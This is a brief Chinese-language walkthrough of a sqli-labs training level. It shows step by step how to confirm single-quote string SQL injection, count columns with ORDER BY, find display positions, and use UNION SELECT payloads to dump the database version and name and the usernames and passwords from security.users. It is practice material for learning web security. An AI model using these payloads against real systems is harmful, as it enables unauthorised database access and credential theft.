sqli-labs通关记录
1.判断是否可以注入
输入?id=1
输入?id=2
由此可以判断出可以进行注入
2.判断什么类型的注入
输入?id=1'
输入?id=1' --+
可以看出第一次输入结果出现错误,第二次输入页面回显正常,说明是单引号字符型注入
3. 判断数据列数
输入?id=1' order by 1 --+
输入?id=1' order by 2 --+
输入?id=1' order by 3 --+
输入?id=1' order by 4 --+
当到4时发生错误,说明他只有三列数据
4.判断显示位
输入?id=555' union select 1,2,3 --+
可以看出仅有两个显示位
5.对数据库进行爆破,查询所需信息
输入?id=-1' union select 1,version(),database() --+
查询到数据库的版本和命名
输入?id=-1' union select 1,2,group_concat(username)from security.users--+
查询到用户名
输入?id=-1' union select 1,2,group_concat(password)from security.users--+